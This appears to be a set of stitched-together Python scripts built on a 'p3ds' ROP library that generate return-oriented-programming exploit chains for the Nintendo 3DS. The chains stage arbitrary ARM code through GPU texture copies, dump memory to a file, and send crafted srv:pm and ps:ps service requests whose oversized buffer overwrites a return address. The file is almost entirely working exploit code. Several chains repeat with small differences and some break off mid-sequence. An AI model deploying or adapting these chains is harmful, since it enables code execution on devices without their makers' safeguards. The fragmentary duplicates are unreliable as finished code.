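def main(argv):
    """Generate a ROP chain that stages an ARM code file and write it to disk.

    argv[0] is the path of the raw ARM code to embed; argv[1] is the output
    path for the generated chain. The addresses and gadgets used below
    (memcpy, gsp_handle, GSPGPU_FlushDataCache,
    nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue, svcSleepThread, gsp_addr,
    gsp_code_addr, fcram_code_addr, payload_addr) as well as ROP, Ref and
    struct are taken from module scope, presumably via the package's star
    imports; none of them is defined in this block.
    """
    with open(argv[0], "rb") as fp:
        arm_code = fp.read()
    armCodeSize = len(arm_code)
    # Pad the code up to the next 16-byte boundary with a 0xDEADBEEF pattern.
    # The pad length is counted in BYTES and applied to both the buffer and
    # armCodeSize so the two stay in sync. The previous version multiplied a
    # 4-byte word by the byte count, which left the buffer
    # 3 * (16 - size % 16) bytes longer than the size the chain copies.
    # "16 - size % 16" (rather than "(-size) % 16") deliberately keeps the
    # old accounting: at least one pad byte is always appended, so the value
    # of armCodeSize and the bytes the chain copies are unchanged.
    padBytes = 16 - armCodeSize % 16
    arm_code += (struct.pack("<I", 0xDEADBEEF) * 4)[:padBytes]
    armCodeSize += padBytes
    r = ROP(0x002B0000)
    # Each r.* call below appends to the chain in order; statement order is
    # the chain layout and must not be rearranged.
    r.call_lr(memcpy, [gsp_addr + gsp_code_addr, Ref("arm_code"), armCodeSize])
    # pop {r4-r6, pc}
    r.call(GSPGPU_FlushDataCache + 4, [gsp_handle, 0xFFFF8001, gsp_addr + gsp_code_addr, armCodeSize], 3)
    # ldmfd sp!, {r4-r8, pc}
    r.call(nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue + 4, [0x27c580 + 0x58, Ref("gxCommand")], 5)
    r.pop_pc()
    r.pop_pc()
    r.pop_pc()
    r.call_lr(svcSleepThread, [0x3B9ACA00, 0x00000000])
    # Jump to payload
    r.i32(0x100000 + payload_addr)
    # Data
    r.label("gxCommand")
    r.i32(0x00000004)  # SetTextureCopy
    r.i32(gsp_addr + gsp_code_addr)  # source
    r.i32(gsp_addr + fcram_code_addr + payload_addr)  # destination
    r.i32(armCodeSize)  # size
    r.i32(0x00000000)  # dim in
    r.i32(0x00000000)  # dim out
    r.i32(0x00000008)  # flags
    r.i32(0x00000000)  # unused
    # The label is referenced by the memcpy call above; the buffer now holds
    # exactly armCodeSize bytes.
    r.label("arm_code")
    r.data(arm_code)
    rop = r.gen()
    with open(argv[1], "wb") as fl:
        fl.write(rop)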
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 2.0. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License 2.0 for more details. # # A copy of the GPL 2.0 should have been included with the program. # If not, see http://www.gnu.org/licenses/ from p3ds.util import * from p3ds.ROP import * r = ROP(0x002B0000) # Clear 0x279004 and 0x279008 #r.pop_r4(0x279004) #r.pop_r1(0x279008) #r.i32(0x101AAC) #r.i32(0x000004) #r.pop_r1(0) #r.store_r1(0x279004) #r.store_r1(0x279008) r.store_i32(0, 0x279004) r.store_i32(0, 0x279008)
def main(argv): r = ROP(0x002B0000) # Set file object u64 offset to 0 r.store_i32(0, 0x279004) r.store_i32(0, 0x279008) # file_open(0x279000, "YS:/DUMP.BIN", 6) r.call(0x1B82AC, [0x279000, Ref("fname"), 6], 5) # file_write(0x279000, 0x279020, 0x100000, 0x300000) r.call(0x1B3B54, [0x279000, 0x279020, 0x100000, 0x300000], 9) # Data. r.label("fname") r.data("YS:/DUMP.BIN".encode('utf-16le') + "\x00\x00") rop = r.gen() #hexdump(rop, base=0x2B0000) with open(argv[0], "wb") as f: f.write(rop)
from p3ds.util import *
from p3ds.ROP import *

# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
PAYLOAD = ""

# Module-level chain builder (no main()). ROP and Ref come from the star
# imports above. This excerpt ends mid-chain, before any gen()/write, and
# PAYLOAD is not referenced in the visible part.
r = ROP(0x002B0000)
r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
r.call(0x105C88, [], 3)
r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
# The following eight statements are emitted once per command word
# (0x04040040, then 0x04030082) with everything else identical; elsewhere
# in this toolkit the same sequence appears to be wrapped in a
# request(r, cmd, proc, port) helper.
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04040040)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04030082)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
# Start of a third repetition of the sequence; cut off by the end of the
# excerpt.
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
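def main(argv):
    """Build a ROP chain embedding an ARM payload file and write the chain out.

    The payload is read from ``sys.argv[2]`` (the interpreter's argv, not
    the ``argv`` parameter) while the chain blob is written to ``argv[0]``;
    the two agree only if the caller passes ``sys.argv[1:]`` as ``argv``,
    which is not visible here. ROP, Ref, request, struct and sys come from
    module scope. Exits with status 1 when no payload path is given.
    """
    if len(sys.argv) < 3:
        print("needs a filename !")
        # Non-zero status so a caller can tell the failure apart from success.
        sys.exit(1)
    # Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0).
    # Read under a context manager so the handle is closed on every path;
    # the previous version opened the file and never closed it.
    with open(sys.argv[2], "rb") as f1:
        PAYLOAD = f1.read()
    r = ROP(0x002B0000)
    # Each r.* call appends to the chain in order; statement order is the
    # chain layout and must not be rearranged.
    # ConnectToPort(&port, "srv:pm");
    r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
    # sub_10CBC0()
    r.call(0x105C88, [], 3)
    # GetProcessId(&proc, 0xFFFF8001);
    r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
    request(r, 0x04040040, Ref("proc"), Ref("port"))
    request(r, 0x04030082, Ref("proc"), Ref("port"))
    # sub_1B2130(&port, "ps:ps", 0x00000005)
    r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
    request(r, 0x20244, Ref("request"), Ref("port"))
    r.i32(0x19FB09)
    # Data.
    r.label("srv:pm")
    r.data("srv:pm\x00")
    r.label("ps:ps")
    r.data("ps:ps\x00")
    # Port.
    r.label("port")
    r.data("\x00" * 0x04)
    # Proc.
    r.label("proc")
    r.data(
        "\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x18\x00")
    r.i32(Ref("wat?"))
    r.data("\x00" * 0x30)
    r.label("wat?")
    r.data(
        "\x41\x50\x54\x3A\x55\x00\x00\x00\x79\x32\x72\x3A\x75\x00\x00\x00"
        "\x67\x73\x70\x3A\x3A\x47\x70\x75\x6E\x64\x6D\x3A\x75\x00\x00\x00"
        "\x66\x73\x3A\x55\x53\x45\x52\x00\x68\x69\x64\x3A\x55\x53\x45\x52"
        "\x64\x73\x70\x3A\x3A\x44\x53\x50\x63\x66\x67\x3A\x75\x00\x00\x00"
        "\x66\x73\x3A\x52\x45\x47\x00\x00\x70\x73\x3A\x70\x73\x00\x00\x00"
        "\x6E\x73\x3A\x73\x00\x00\x00\x00\x61\x6D\x3A\x6E\x65\x74\x00\x00")
    r.data("\x00" * 0xA0)
    # Request.
    r.label("request")
    r.data("\x00" * 0x20)
    r.data("\x00\x00\x00\x00\x02\x00\x82\x00")
    r.i32(Ref("reqpart1"))
    # 0xE440 << 4 | 0xA, little-endian. (The earlier comment said 0x7440,
    # but the bytes here and the fill count below both encode 0xE440.)
    r.data("\x0A\x44\x0E\x00")
    r.i32(Ref("reqpart2"))
    r.data("\x00" * 0x4C)
    r.label("reqpart1")
    r.data("\x00" * 0x200)
    r.data("\x00\xA2\x03\x00")
    r.data("\x00" * 0xFC)
    r.label("reqpart2")
    # length = 0xE440, return addr = 0x080C3EE0.
    # Floor division keeps the Python 2 integer semantics under Python 3 too
    # (a float repeat count would raise TypeError).
    r.data(PAYLOAD + struct.pack("<I", 0x080C3EE0) * (0xE440 // 4 - len(PAYLOAD) // 4))
    rop = r.gen()
    #hexdump(rop, base=0x2B0000)
    with open(argv[0], "wb") as f:
        f.write(rop)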
def main(argv):
    """Build a ROP chain with an (empty) inline ARM payload and write it out.

    argv[0] is the output path for the generated chain blob. PAYLOAD is the
    empty string in this variant, so the "reqpart2" region consists solely
    of 0x7440/4 copies of the 0x080C3EE0 word. ROP, Ref, request and struct
    are not defined in this block; they come from module scope (not visible
    here). The r.* calls append to the chain in order, so statement order
    is the chain layout.
    """
    # Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
    PAYLOAD = ""
    r = ROP(0x002B0000)
    # ConnectToPort(&port, "srv:pm");
    r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
    # sub_10CBC0()
    r.call(0x105C88, [], 3)
    # GetProcessId(&proc, 0xFFFF8001);
    r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
    request(r, 0x04040040, Ref("proc"), Ref("port"))
    request(r, 0x04030082, Ref("proc"), Ref("port"))
    # sub_1B2130(&port, "ps:ps", 0x00000005)
    r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
    request(r, 0x20244, Ref("request"), Ref("port"))
    r.i32(0x19FB09)
    # Data.
    r.label("srv:pm")
    r.data("srv:pm\x00")
    r.label("ps:ps")
    r.data("ps:ps\x00")
    # Port.
    r.label("port")
    r.data("\x00" * 0x04)
    # Proc.
    r.label("proc")
    r.data(
        "\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x18\x00")
    r.i32(Ref("wat?"))
    r.data("\x00" * 0x30)
    r.label("wat?")
    r.data(
        "\x41\x50\x54\x3A\x55\x00\x00\x00\x79\x32\x72\x3A\x75\x00\x00\x00"
        "\x67\x73\x70\x3A\x3A\x47\x70\x75\x6E\x64\x6D\x3A\x75\x00\x00\x00"
        "\x66\x73\x3A\x55\x53\x45\x52\x00\x68\x69\x64\x3A\x55\x53\x45\x52"
        "\x64\x73\x70\x3A\x3A\x44\x53\x50\x63\x66\x67\x3A\x75\x00\x00\x00"
        "\x66\x73\x3A\x52\x45\x47\x00\x00\x70\x73\x3A\x70\x73\x00\x00\x00"
        "\x6E\x73\x3A\x73\x00\x00\x00\x00\x61\x6D\x3A\x6E\x65\x74\x00\x00")
    r.data("\x00" * 0xA0)
    # Request.
    r.label("request")
    r.data("\x00" * 0x20)
    r.data("\x00\x00\x00\x00\x02\x00\x82\x00")
    r.i32(Ref("reqpart1"))
    r.data("\x0A\x44\x07\x00")  # 0x7440 << 4 | 0xA (little-endian)
    r.i32(Ref("reqpart2"))
    r.data("\x00" * 0x4C)
    r.label("reqpart1")
    r.data("\x00" * 0x200)
    r.data("\x00\xA2\x03\x00")
    r.data("\x00" * 0xFC)
    r.label("reqpart2")
    # length = 0x7440, return addr = 0x080C3EE0
    # "/" here is Python 2 integer division; under Python 3 the repeat
    # count would be a float and "bytes * float" raises TypeError.
    r.data(PAYLOAD + struct.pack("<I", 0x080C3EE0) * (0x7440/4 - len(PAYLOAD)/4))
    rop = r.gen()
    #hexdump(rop, base=0x2B0000)
    with open(argv[0], "wb") as f:
        f.write(rop)
from p3ds.util import *
from p3ds.ROP import *
import sys

# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
# The payload is read from the first command-line argument. sys.argv[1] is
# accessed without a length check, so running with no argument raises
# IndexError rather than printing a usage message.
with open(sys.argv[1], "rb") as myfile:
    PAYLOAD = myfile.read()

# Module-level chain builder (no main()). ROP and Ref come from the star
# imports above. This excerpt ends mid-chain, before any gen()/write, and
# PAYLOAD is not referenced in the visible part.
r = ROP(0x002B0000)
r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
r.call(0x105C88, [], 3)
r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
# The following eight statements are emitted once per command word
# (0x04040040, then 0x04030082) with everything else identical; elsewhere
# in this toolkit the same sequence appears to be wrapped in a
# request(r, cmd, proc, port) helper.
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04040040)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04030082)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
# Start of a third repetition of the sequence; cut off by the end of the
# excerpt.
r.pop_r4(0x279020)
r.i32(0x1C1958)